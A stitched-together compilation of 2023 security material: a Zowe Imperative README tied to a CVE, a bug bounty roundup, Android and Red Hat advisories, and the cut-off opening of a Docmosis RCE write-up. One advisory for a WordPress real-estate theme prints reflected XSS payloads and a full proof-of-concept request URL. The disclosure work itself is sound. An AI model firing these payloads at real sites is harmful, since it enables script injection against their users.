A vulnerability in Imperative framework which allows already-privileged local actors to execute arbitrary shell commands via plugin install/update commands, or maliciously formed environment variables. Impacts Zowe CLI.

**Imperative CLI Framework**

Imperative CLI Framework is a command processing system that lets you quickly build customized command-line interfaces. Focus on adding functionality for your users rather than creating CLI infrastructure. We provide you with all the tools to get started building your own CLI plug-ins.

**Software Requirements**

*   **Install Node.js package manager** on your computer. Node.js® is a JavaScript runtime environment on which we architected Imperative CLI Framework.
    
*   You must have a means to execute ".sh" (bash) scripts to run integration tests. On Windows, you can install "Git Bash", which is bundled with the standard Git installation - (choose the "Use Git and Unix Tools from Windows Command Prompt" installation option). When you run the integration tests on Windows, you must have Administrative authority to enable the integration tests to create symbolic links.
    

**Note:** Broadcom Inc. does not maintain the prerequisite software that Imperative CLI Framework requires. You are responsible for updating Node.js and other prerequisites on your computer. We recommend that you update Node.js regularly to the latest Long Term Support (LTS) version.

**Install Imperative as a Dependency**

Issue the following commands to install Imperative CLI Framework as a dependency.

*   **Install @latest version:**
    
    Be aware that if you update via @latest, you accept breaking changes into your project.
    
    npm install @zowe/imperative
    
*   **Install @zowe-v2-lts version:**
    
    This is a Long Term Support release that is guaranteed to have no breaking changes.
    
    npm install @zowe/imperative@zowe-v2-lts
    

**Note:** If you want to install the bleeding edge version of Imperative, you can append --@zowe:registry=https://zowe.jfrog.io/zowe/api/npm/npm-release/ to the install command to get it from a staging registry. It is not recommended to use this registry for production dependencies.

**Build and Install Imperative CLI Framework from Source**

To build and install the Imperative CLI Framework, follow these steps:

1.  Clone the zowe/imperative project to your PC.
2.  From the command line, issue cd [relative path]/imperative
3.  Issue npm install
4.  Issue npm run build
5.  Issue npm run test

To build the entire project (including test stand-alone CLIs): npm run build

To build only imperative source: npm run build:packages

**Run Tests**

Command

Description

npm run test

Run all automated tests (unit & integration)

npm test:unit

Run unit tests

npm test:integration

Run integration tests

npm test:system

Run system tests (requires IPv6 connection)

**Note:** To build and install the test CLIs used by the integration tests:

1.  node scripts/sampleCliTool.js build
2.  node scripts/sampleCliTool.js install

**Sample Applications**

We provide a sample plug-in that you can use to get started developing your own plug-ins. See the Zowe CLI Sample Plug-in.

**Documentation**

We provide documentation that describes how to define commands, work with user profiles, and more! For more information, see the Imperative CLI Framework wiki.

**Contribute**

For information about how you can contribute code to Imperative CLI Framework, see CONTRIBUTING

**Versioning**

Imperative CLI Framework uses Semantic Versioning (SemVer) for versioning. For more information, see the Semantic Versioning website.

**Licencing Imperative CLI Framework**

For Imperative CLI Framework licensing rules, requirements, and guidelines, see LICENSE.

CVE-2021-4326: GitHub - zowe/imperative: Imperative CLI Framework

Unauthenticated Java deserialization vulnerability in Serviceguard Manager

CVE-2022-37936

New web targets for the discerning hacker

New web targets for the discerning hacker

Belgium became a haven for ethical hackers following the adoption of a nationwide safe harbor agreement last month.

The framework means that well-intentioned security researchers are free from legal jeopardy when they come to report computer security vulnerabilities in any system located in the European country – providing they follow a strict set of conditions and rules of conduct.

The guidelines, announced by the Centre for Cyber Security Belgium, apply to both private and public sector organizations. Belgium is further ahead on the curve, but it’s hoped that the scheme will inspire other countries to follow suit and companies to roll out vulnerability disclosure programs of their own.

In less congenial bug bounty-related news, independent researcher Peter Geissler publicly released the details of a set of vulnerabilities affecting Lexmark printers rather than accepting what he considered a derisory reward. The security bugs – which could be chained together to create a remote code execution attack – have since been fixed.

Another example of researchers baulking at bug bounty conditions came in the disclosure of a web security flaw in a marketing widget from analysts Gartner.

Security researcher Justin Steven wanted to write-up the technical details of a DOM-based cross-site scripting vulnerability in the Gartner Peer Insights widget, but the analyst firm warned the researcher that that it violated the rules of the private bug bounty program.

Steven publicly disclosed technical details of the vulnerability anyway, even though this meant he went without payment for the find.

There was drama aplenty when a new host of popular hacking tool XSS Hunter disclosed telemetry (anonymized statistics about the vulnerabilities unearthed) from security researchers using its version of the utility. Truffle Security faced a privacy backlash from security researchers upset that it was seemingly “peering over their shoulder” and going through their findings.

In response to the criticism, Truffle Security began offering end-to-end encryption as an option to security researchers using its version of XSS Hunter.

**The latest bug bounty programs for March 2023**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**ATG (Enhanced)**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**ATG has raised rewards for medium, high, and critical bugs, and broadened its scope to encompass .atg.se and its subdomains. ATG is a Swedish gaming company that specializes in horse racing.

Check out the ATG bug bounty page for more details

**Bybit**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$20,000

**Outline:  
**The cryptocurrency exchange is paying out between $5,000 and $20,000 for the highest tier of criticality. The sole target in scope is bybit.com.

Check out the Bybit bug bounty page for more details

**Grindr**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**The location-based social networking and dating application for the LGBTQ community cites RCE, arbitrary SQL queries on production databases, and significant authentication bypass flaws as potentially critical bugs.

Check out the Grindr bug bounty page for more details

**Linktree**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$7,500

**Outline:  
**Australian social media tool Linktree, which has 30 million users globally, has put “most” of its assets within the scope of the bug bounty program.

Check out the Linktree bug bounty page for more details

**Malwarebytes**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,000

**Outline:  
**The anti-malware firm is offering payouts of between $50 and $2,000 for confirmed vulnerabilities. Those posing an RCE risk to Malwarebytes’ web properties or customers running its endpoint protection software, or leading to the takeover of AWS cloud infrastructure, will attract the greatest rewards.

Check out the Malwarebytes bug bounty page for more details

**Miro**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**The collaborative whiteboarding platform is offering rewards of up to $3,000. Out of scope assets include Jira Cards by Miro, Miro for Confluence, and Miro for Jira Cloud.

Check out the Miro bug bounty page for more details

**Ninja Kiwi Games**

**Program provider:  
**Intigriti

**Program type:  
**Public

**Max reward:  
**$3,750

**Outline:  
**The New Zealand-based video game developer has launched a second bug bounty program after a successful 2021 forerunner. Ninja Kiwi Games has created the Bloons, Bloons TD, and SAS: Zombie Assault franchises.

Check out the Ninja Kiwi Games bug bounty page for more details

**QNAP**

**Program provider:  
**Independent

**Program type:  
**Public

**Max reward:  
**Undisclosed

**Outline:  
**QNAP, the Taiwanese manufacturer of network-attached storage appliances, has invited hackers to probe its operating systems, applications, and cloud services for vulnerabilities.

Check out the QNAP bug bounty page for more details

**Skinport**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$6,000

**Outline:  
**Skinport, a marketplace for digital in-game items, has launched a program with rewards for critical flaws that open the door to trading or purchase manipulations. Vulnerabilities that result in unauthorized access to project servers or the disclosure of confidential data are also within scope.

Check out the Skinport bug bounty page for more details

**Spin by OXXO**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**In scope are an API plus iOS and Android mobile applications of Spin, a fintech app and payment card from Mexican convenience store chain Oxxo.

Check out the Spin by OXXO bug bounty page for more details

**Xdefi Technologies**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Xdefi, a cross-chain wallet extension for cryptocurrencies and NFTs, has included in the in-scope assets Xdefi Extension (Chromium web extension) and app, with rewards based on severity as per the CVSS (the Common Vulnerability Scoring Standard).

Check out the Xdefi bug bounty page for more details

**Zabbix**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**Zabbix, a vendor which provides open source infrastructure monitoring technologies, is offering up to $1,000 for high severity bugs and $3,000 for critical flaws.

Check out the Zabbix bug bounty page for more information

**Other bug bounty and VDP news this month**

*   Google has expanded its OSS Fuzz code testing service by upgrading its reward program and increasing the number of computing languages covered by the project
*   The search engine giant has also paid out its largest-ever bug bounty – worth a potentially life-changing £500,000 ($605,000) – for an Android\-related vulnerability. Google is staying tight-lipped about the details of the flaw but ITPro has narrowed down the list of possibilities
*   Intel reports that it paid out $935,000 in bug bounties last year. The chip giant’s Intel Product Security Report (pdf) said that it triaged 243 vulnerabilities in 2022, 90 of which were discovered by security researchers and reported through its bug bounty programs. The vendor “engaged 151 researchers last year, more than double compared to the previous three years”, Security Week reports.
*   An in-depth article on the YesWeHack blog by security researchers BitK and SakiiR offers a technical perspective on detecting and exploiting prototype pollution vulnerabilities in JavaScript. The research builds on earlier work by Portswigger’s Gareth Heyes on detecting server-side prototype pollution-type security flaws.
*   Security researcher Mike Takahashi has put together a Twitter thread on the so-hot topic of how AI-powered chatbots such as ChatGPT might be able to assist bug bounty hunters. The social media “brainstorm” by Takahashi is the second part in what might become an ongoing series.

Additional reporting by Adam Bannister

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for February 2023

Bug Bounty Radar // The latest bug bounty programs for March 2023

An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2022-41727

A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.

CVE-2022-41723

WordPress Real Estate 7 Theme versions 3.3.4 and below suffer from a cross site scripting vulnerability.

    ==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)Google Dork:         inurl:/wp-content/themes/realestate-7/Research Date:       2023-02-10Researcher:          FearZzZz [ https://fearzzzz.ru ]Component Vendor:    Contempo Themes [ https://contempothemes.com ]Vulnerable Version:  <= 3.3.4Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778CVSS Base Score:     6.1 (Medium)CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NOWASP Top 10:        A7: Cross-Site Scripting (XSS)CWE:                 CWE-79CVE:                 TBA=================================================================================================#### [ Description: ]The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.#### [ Impact: ]Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.#### [ Payloads: ]```<img src=x onerror=(alert)(`FearZzZz`);>``````<svg/onload=alert(`FearZzZz`)>```#### [ Proof-of-Concept: ]https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3EGET /?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E HTTP/2Host: elementor3.contempothemes.com#### [ Timeline: ]2023.02.08 - Real Estate 7 Theme v3.3.4 released.2023.02.10 - Vulnerability has been discovered.2023.02.13 - Vendor notified, received a quick response.2023.02.13 - Real Estate 7 Theme v3.3.5 released, the vulnerability has been fixed.#### [ Contacts: ]Website:   fearzzzz.ruEmail:     fearzzzz@tutanota.comTwitter:   https://twitter.com/fear_zzzzMedium:    https://fearzzzz.medium.comGitHub:    https://github.com/fearzzzzYouTube:   https://youtube.com/@fearzzzz#### [ Notes: ]Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.#### [ Disclaimer: ]The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.========================================================================== [ www.fearzzzz.ru ] ==

WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting

Relative Path Traversal vulnerability in ForgeRock Access Management Java Policy Agent allows Authentication Bypass.This issue affects Access Management Java Policy Agent: from 1.0.0 through 5.10.1.

CVE-2023-0511: Downloads - BackStage

In addAutomaticZenRule of ZenModeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242537431

_Published February 6, 2023 | Updated February 8, 2023_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2023-02-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a high security vulnerability in the Framework component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2023-02-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-02-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-27059

A-159249069

EoP

High

12, 12L

CVE-2022-20443

A-194480991 \[2\]

EoP

High

11, 12, 12L

CVE-2022-20551

A-243376549

EoP

High

12, 12L, 13

CVE-2023-20934

A-258672042 \[2\]

EoP

High

12, 12L, 13

CVE-2023-20942

A-258021433

EoP

High

12, 12L, 13

CVE-2023-20943

A-240267890

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20944

A-244154558

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20948

A-230630526

ID

High

12, 12L, 13

**Media Framework**

The vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20933

A-245860753

EoP

High

10, 11, 12, 12L, 13

**System**

The most severe vulnerability in this section could lead to remote code execution with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-43680

A-255449293

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20939

A-243362981

EoP

High

12, 12L, 13

CVE-2023-20940

A-256237041

EoP

High

13

CVE-2023-20945

A-246932269

EoP

High

10

CVE-2023-20946

A-244423101

EoP

High

11, 12, 12L, 13

CVE-2022-20481

A-241927115

ID

High

10, 11, 12, 12L, 13

CVE-2023-20932

A-248251018

ID

High

10, 11, 12, 12L, 13

CVE-2022-20455

A-242537431 \[2\] \[3\] \[4\] \[5\]

DoS

High

10, 11, 12, 12L, 13

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Subcomponent

CVE

WiFi

CVE-2022-20481

**2023-02-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-02-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Subcomponent

CVE-2022-39189

A-245869446  
Upstream kernel

EoP

High

KVM

CVE-2022-39842

A-245928838  
Upstream kernel

EoP

High

Video

CVE-2022-41222

A-248354871  
Upstream kernel

EoP

High

Kernel memory subsystem

CVE-2023-20937

A-257443051  
Upstream kernel \[2\] \[3\] \[4\] \[5\] \[6\] \[7\]

EoP

High

Memory Management

CVE-2023-20938

A-257685302  
Upstream kernel \[2\] \[3\] \[4\] \[5\] \[6\]

EoP

High

Binder

CVE-2022-0850

A-245406696  
Upstream kernel

ID

High

ext4

**MediaTek components**

This vulnerability affects MediaTek components and further details are available directly from MediaTek. The severity assessment of this issue is provided directly by MediaTek.

    

CVE

References

Severity

Subcomponent

CVE-2023-20602  

A-261367136  
M-ALPS07494107 \*

High

ged

**Unisoc components**

These vulnerabilities affect Unisoc components and further details are available directly from Unisoc. The severity assessment of these issues is provided directly by Unisoc.

    

CVE

References

Severity

Subcomponent

CVE-2022-47331  

A-262503737  
U-1946329 \*

High

Kernel

CVE-2022-47339  

A-262503731  
U-2029419 \*

High

Android

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Subcomponent

CVE-2022-33243  

A-245402502  
QC-CR#3217329

Critical

Kernel

CVE-2022-33280  

A-250627584  
QC-CR#3040964 \[2\] \[3\]

Critical

Bluetooth

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Subcomponent

CVE-2022-33232  

A-240972480 \*

Critical

Closed-source component

CVE-2022-40514  

A-258057252 \*

Critical

Closed-source component

CVE-2022-33221  

A-240972893 \*

High

Closed-source component

CVE-2022-33233  

A-240972514 \*

High

Closed-source component

CVE-2022-33248  

A-240972595 \*

High

Closed-source component

CVE-2022-33271  

A-258057374 \*

High

Closed-source component

CVE-2022-33277  

A-258057281 \*

High

Closed-source component

CVE-2022-33306  

A-258057409 \*

High

Closed-source component

CVE-2022-34145  

A-258057258 \*

High

Closed-source component

CVE-2022-34146  

A-258057317 \*

High

Closed-source component

CVE-2022-40502  

A-258057203 \*

High

Closed-source component

CVE-2022-40512  

A-258057239 \*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2023-02-01 or later address all issues associated with the 2023-02-01 security patch level.
*   Security patch levels of 2023-02-05 or later address all issues associated with the 2023-02-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-02-01\]
*   \[ro.build.version.security\_patch\]:\[2023-02-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-02-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2023-02-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2023-02-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

February 6, 2023

Bulletin Published

1.1

February 8, 2023

Bulletin revised to include AOSP links

CVE-2022-20455: Android Security Bulletin—February 2023

Red Hat Security Advisory 2023-0958-01 - Vim is an updated and improved version of the vi editor.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: vim security update  
Advisory ID:       RHSA-2023:0958-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0958  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-47024   
=====================================================================

1. Summary:

An update for vim is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Vim (Vi IMproved) is an updated and improved version of the vi editor.

Security Fix(es):

* vim: no check if the return value of XChangeGC() is NULL (CVE-2022-47024)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2163613 - CVE-2022-47024 vim: no check if the return value of XChangeGC() is NULL

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
vim-X11-8.2.2637-20.el9_1.aarch64.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debugsource-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.aarch64.rpm

ppc64le:  
vim-X11-8.2.2637-20.el9_1.ppc64le.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debugsource-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm

s390x:  
vim-X11-8.2.2637-20.el9_1.s390x.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-common-8.2.2637-20.el9_1.s390x.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debugsource-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.s390x.rpm

x86_64:  
vim-X11-8.2.2637-20.el9_1.x86_64.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debugsource-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
vim-8.2.2637-20.el9_1.src.rpm

aarch64:  
vim-X11-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debugsource-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.aarch64.rpm

noarch:  
vim-filesystem-8.2.2637-20.el9_1.noarch.rpm

ppc64le:  
vim-X11-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debugsource-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm

s390x:  
vim-X11-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debugsource-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.s390x.rpm

x86_64:  
vim-X11-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debugsource-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47024  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zu9zjgjWX9erEAQjjqw//RfPjkA9+ULyz/haWxVeFiOp4pKtsrL6l  
Zbah1fUhP4U+JrjzxGTrRPGpNXDlxV6xm8Po79jk7VfsZ2VekOaspp/hCqs7PQbW  
8Wc7jkPpUh9Lk0elFvvyxIQ6OZEjT+pfTvu0orbLC4cJwAbM7cylT/uZlBiMqQWQ  
FDETC9NzwZkKtOL6Nw+r04Qa1VEszWM17wbGWboMT2abXgLT/C/sGOcGh7id+Jbr  
7NEuzrG18lq1jRTSWU72Pmz+Vxd0mk4mwS2YcZh9uYDLYOcKcDOWQzQH1Y341fO3  
ZcsKNCtrW1ZTqXcZYiv/4Tn4ttELdM0Rt+SiOnE7H6G1GA3FCo4NmBk9mx8BQX10  
r9I+TJllCAM1zr/HVIA95oWpji2np7cT3fxzMwkor5OBlGsVukFws4ZabEWgO/Jo  
I6rLp6Ips+KA73chHAGCdbz3bAjcfFJMqPoxFKS0XGh7d1lT6+zGax1NhsJDkIdM  
TG1SwtA54UeaQboKPLdQTKXiAlNA6hG0cc5g0PKvwpGKrVNb/g+rB5lMhhNq0lkC  
53mSm9fB5IZPsjJB3qYDvhKFUhfrBKZZtlZ0rc4+g7AyOGqx48QaJb2u5MgXg512  
ZXYDMWsZdgT9s9mIUNgKRmIj1z+qnrmX21XTFqvpn6Fb6Ss5CT7HCaUwkKkwWj2O  
4nohN9fIiz4=  
=Evof  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0958-01

An issue was discovered in Docmosis Tornado prior to version 2.9.5. An authenticated attacker can change the Office directory setting pointing to an arbitrary remote network path. This triggers the execution of the soffice binary under the attackers control leading to arbitrary remote code execution (RCE).

Recently, I did a non-exhaustive security product review on a Document Generator Engine, named **Docmosis**. A system I targeted used **Docmosis Tornado** in its latest version **2.9.4**. I’ll give you a walkthrough based on my local lab installation with a Proof-of-Concept exploitation on an on-premises system belonging to a specialized agency of the United Nations.

By default, no login is needed to access the web UI :-0. But as we’ll see, even if the password protection is enabled/configured, there is an **Authentication Bypass** which makes all these findings exploitable from an **unauthenticated context** as well. But let’s go through all the findings step by step.

**Remote Code Execution**

